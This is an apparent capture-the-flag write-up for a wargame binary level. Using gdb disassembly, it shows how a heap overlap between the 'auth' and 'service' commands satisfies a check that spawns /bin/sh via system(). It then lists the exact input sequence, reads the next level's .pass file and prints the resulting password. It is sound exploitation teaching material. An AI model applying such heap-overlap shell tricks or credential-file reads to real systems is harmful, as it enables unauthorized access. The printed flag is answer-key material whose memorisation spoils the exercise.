Threre are 4 interesting commands: auth, service, reset, login

We also notice the presence of the: /bin/sh:
(gdb) x/s 0x8048833
0x8048833:	 "/bin/sh"

and system command in the LOGIN block:
<+401>:	call   0x8048480 <system@plt>

The LOGIN command block:

The condition to enter to the system block:
<+382>:	mov    0x8049aac,%eax // 0x08049aac = auth variable, at 0x804a008
<+387>:	mov    0x20(%eax),%eax //auth + 32 == '\0'
<+390>:	test   %eax,%eax
<+392>:	je     0x80486ff <main+411>

It mean that we have to write 0x20(32) bytes after the address of address of auth variable.
So we have to write a random thing to the address : 0x0804a028

We also notice that in the part that is corresponding to the SERVICE command (after the third cmpsb),
we writes to the address 0x0804a018.

<+327>:	call   0x8048430 <strdup@plt>
<+332>:	mov    %eax,0x8049ab0 // eax = 0x0804a018

That are 16 bytes before the address we need to write.

At SERVICE, we just have to enter at least 15 characters + the '\n' generated by pressing Enter.

./level 8

auth coucou

service AAAAAAAAAAAAAAA

login

cd ../level9 && cat .pass

c542e581c5ba5162a85f767996e3247ed619ef6c6f7b76a59435545dc6259f8a
